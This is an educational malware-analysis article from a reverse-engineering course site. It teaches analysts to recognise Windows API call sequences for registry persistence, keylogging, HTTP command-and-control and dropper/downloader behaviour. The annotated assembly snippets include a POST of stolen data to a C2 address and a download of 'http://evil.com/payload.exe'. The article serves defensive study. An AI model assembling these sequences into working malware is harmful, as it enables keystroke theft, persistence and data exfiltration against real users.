EpochZero Learn
EpochZero LearnMulti-Domain Tech Learning Hub
Courses
LeaderboardAbout
Dashboard
EpochZero
EpochZero Learn
Multi-Domain Tech Learning Hub

Structured learning for Reverse Engineering, Cloud Security, Cryptography, and Web Development. Articles, videos, tests, and peer discussion.

Learn

  • Learning Path
  • All Articles
  • Video Lessons
  • Podcast
  • eBooks & PDFs
  • Question Banks
  • Cheatsheets
  • MCQ Banks

Tests & Forum

  • All Tests
  • REMA Tests
  • Cloud Tests
  • Forum
  • REMA Forum
  • Cloud Forum
  • Crypto Forum
  • Web Dev Forum

Campus

  • REMA Club
  • Full Stack Dev Club
  • Extension Activity
  • Events
  • CTF Competitions
  • Workshops
  • Industrial Visits

Platform

  • Dashboard
  • Leaderboard
  • About
  • Verify Certificate

© 2026 EpochZero Learn. Educational content for learning purposes.

Course Instructor: Ashish Revar

All articles
Educationwindows-apiregistrykeylogger

Windows API Patterns in Malware

The four core Windows API call sequences every analyst must recognise — registry persistence, keylogging, HTTP C2 communication, and dropper/downloader behaviour — with assembly-level examples.

Ashish Revar12 May 202618 min read2 views

Sign in to mark this article as read and track your progress.

Related to this topic

Continue learning

Listen

The Malicious Process Lifecycle: From Execution to Evasion

How malware executes, establishes persistence, injects into legitimate processes, and evades detection inside modern operating systems.

Reference material

eBook
REMA eBook 2026
v1.0
Open resource
Cheatsheet
REMA Cheatsheet 2026
v1.0
Open resource
MCQ Bank
REMA MCQ Bank 2026
v1.0
Open resource
Question Bank
REMA Question Bank 2026
v1.0
Open resource

External references

MITRE ATT&CK — Windows API Technique Coverage

Browse all ATT&CK techniques by tactic. Each entry lists the Windows APIs used to implement it with real-world procedure examples.

reference
EpochZero Article — njRAT Static Analysis Walkthrough

Walkthrough showing these exact API patterns in a real RAT sample including keylogging and C2 communication code.

article
More articlesTest your knowledge

Overview

After reconstructing control flow, the analyst identifies what the malware does by examining its Windows API calls. Four behavioural patterns account for the majority of what commodity malware does: persisting via the registry, capturing keystrokes, communicating with a C2 server over HTTP, and delivering a second-stage payload.

Each pattern has a characteristic API call sequence. Recognising the sequence in disassembly or in a dynamic trace immediately classifies the behaviour.

Pattern 1: Registry Persistence

Malware writes to the registry primarily to survive reboots. The most common persistence location is the Run key under HKEY_CURRENT_USER — it requires no administrator privileges.

API sequence

; Open the Run key
push  KEY_SET_VALUE
push  0
lea   eax, [ebp+hKey]
push  eax
push  offset aRun        ; "Software\Microsoft\Windows\CurrentVersion\Run"
push  HKEY_CURRENT_USER
call  RegOpenKeyExA

; Write the payload path as a new value
push  len_path
push  offset malware_path  ; "C:\Users\...\svchost32.exe"
push  REG_SZ
push  0
push  offset aValueName    ; "WindowsUpdate" (disguised name)
push  [ebp+hKey]
call  RegSetValueExA

IOCs extracted from assembly:

  • Registry path: Software\Microsoft\Windows\CurrentVersion\Run
  • Value name: WindowsUpdate
  • Payload path: C:\Users\...\svchost32.exe

MITRE ATT&CK mapping

T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Pattern 2: Keylogging

Two implementation approaches exist. Hook-based keylogging is more common in professional malware; polling is simpler to implement.

Hook-based (SetWindowsHookEx)

push  offset KeyboardProc   ; callback function address
push  0                     ; dwThreadId = 0 (all threads)
push  0                     ; hMod = NULL (same process)
push  WH_KEYBOARD_LL        ; idHook = 13
call  SetWindowsHookExA

WH_KEYBOARD_LL (value 13) is the first argument — its presence immediately identifies a low-level keyboard hook installation.

Polling-based (GetAsyncKeyState)

poll_loop:
    push  ecx               ; virtual key code (0x01 to 0xFE)
    call  GetAsyncKeyState
    test  eax, 0x8000       ; high bit set = key currently pressed
    jz    next_key
    ; log this key
next_key:
    inc   ecx
    cmp   ecx, 0xFF
    jl    poll_loop

Supporting APIs that appear alongside keyloggers:

APIPurpose
GetForegroundWindowWhich application is active
GetWindowTextA/WWindow title — logged with keystrokes
CreateFileA + WriteFileWriting keylog to file
InternetOpenA + HttpSendRequestAExfiltrating keylog via HTTP

MITRE ATT&CK mapping

T1056.001 — Input Capture: Keylogging

Pattern 3: HTTP C2 Communication

Malware using the WinINet API family for C2 communication follows a consistent five-call sequence:

; 1. Initialise WinINet session
push  offset szAgent    ; "Mozilla/5.0 (compatible)"  ← USER-AGENT IOC
push  INTERNET_OPEN_TYPE_PRECONFIG
call  InternetOpenA

; 2. Connect to C2
push  0
push  0
push  INTERNET_SERVICE_HTTP
push  80                ; port
push  offset szC2       ; "185.220.x.x"  ← C2 ADDRESS IOC
push  eax               ; hInternet
call  InternetConnectA

; 3. Create request
push  0
push  0
push  0
push  HTTP_ADDREQ_FLAG_ADD
push  0
push  offset szURI      ; "/gate.php"  ← URI IOC
push  offset szVerb     ; "POST"
push  eax               ; hConnect
call  HttpOpenRequestA

; 4. Send (with POST data = stolen information)
push  dwDataLen
push  offset szData     ; base64-encoded stolen data
push  eax               ; hRequest
call  HttpSendRequestA

; 5. Read response (contains C2 commands)
push  offset dwRead
push  BUF_SIZE
push  offset szBuf
push  eax               ; hRequest
call  InternetReadFile

IOCs extracted from assembly:

  • User-Agent: Mozilla/5.0 (compatible)
  • C2 IP/hostname: 185.220.x.x
  • URI path: /gate.php
  • HTTP verb: POST

MITRE ATT&CK mapping

T1071.001 — Application Layer Protocol: Web Protocols

Pattern 4: Dropper and Downloader Behaviour

Dropper — embedded payload

; Extract payload from PE resources
push  RT_RCDATA
push  offset szResName
push  hModule
call  FindResourceA

push  eax
push  hModule
call  LoadResource

push  eax
call  LockResource      ; returns pointer to embedded payload

; Write to disk
push  0
push  NULL
push  CREATE_ALWAYS
push  NULL
push  NULL
push  GENERIC_WRITE
push  offset szDropPath ; "C:\...\update.exe"
call  CreateFileA

push  NULL
push  dwSize
push  pPayload
push  hFile
call  WriteFile

; Execute
push  NULL
push  NULL
push  CREATE_NEW_CONSOLE
push  NULL
push  NULL
push  NULL
push  NULL
push  NULL
push  offset szDropPath
push  NULL
call  CreateProcessA

Downloader — remote payload

Replace the FindResource/LoadResource/LockResource sequence with a single call:

push  offset szLocalPath  ; "C:\...\update.exe"
push  offset szUrl        ; "http://evil.com/payload.exe"
push  0
push  0
call  URLDownloadToFileA

API sequence quick reference

BehaviourKey APIsMITRE
Registry persistenceRegOpenKeyExA + RegSetValueExAT1547.001
Hook keyloggerSetWindowsHookExA (arg = 13)T1056.001
Poll keyloggerGetAsyncKeyState loopT1056.001
HTTP C2InternetOpenA → InternetConnectA → HttpSendRequestAT1071.001
DropperFindResource → WriteFile → CreateProcessAT1105
DownloaderURLDownloadToFileA → CreateProcessAT1105